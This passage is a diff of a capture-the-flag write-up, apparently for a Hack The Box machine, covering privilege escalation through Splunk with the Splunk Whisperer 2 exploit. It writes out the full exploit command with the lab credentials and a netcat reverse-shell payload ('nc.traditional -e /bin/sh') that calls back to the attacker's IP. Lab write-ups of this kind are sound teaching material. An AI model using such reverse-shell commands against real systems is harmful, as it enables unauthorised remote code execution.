 Privilege Escalation - Splunk Whisperer

 There is one more thing I didn't use so far - the Splunk service.
 I did a lot of research on the internet until I found something I could use - an exploit called Splunk Whisperer 2.
 However, I needed credentials for it to work, and I didn't have any.
-I got stuck again for some time, when I finally decided to try the current user - shaun
+I got stuck again for some time, when I finally decided to try the current user - shaun with password Guitar123.
+It worked.
+So much time wasted.
+I got access to the protected area of the web panel, but most importantly, I had a set of credentials to use with the exploit I found.

-Again, the reverse shell I used had to be persistent and use the traditional version of netcat
+Again, the reverse shell I used had to be persistent and use the traditional version of netcat.

-[email protected]:~/doctor/SplunkWhisperer2/PySplunkWhisperer2$ python PySplunkWhisperer2_remote.py --lhost 10.10.15.56 --host 10.10.10.209 --username shaun --password Guitar123 --payload 'nc.traditional -e /bin/sh 10.10.15.56 4446'
+znq@sydney:~/doctor/SplunkWhisperer2/PySplunkWhisperer2$ python PySplunkWhisperer2_remote.py --lhost 10.10.15.56 --host 10.10.10.209 --username shaun --password Guitar123 --payload 'nc.traditional -e /bin/sh 10.10.15.56 4446'

 Running in remote mode (Remote Code Execution)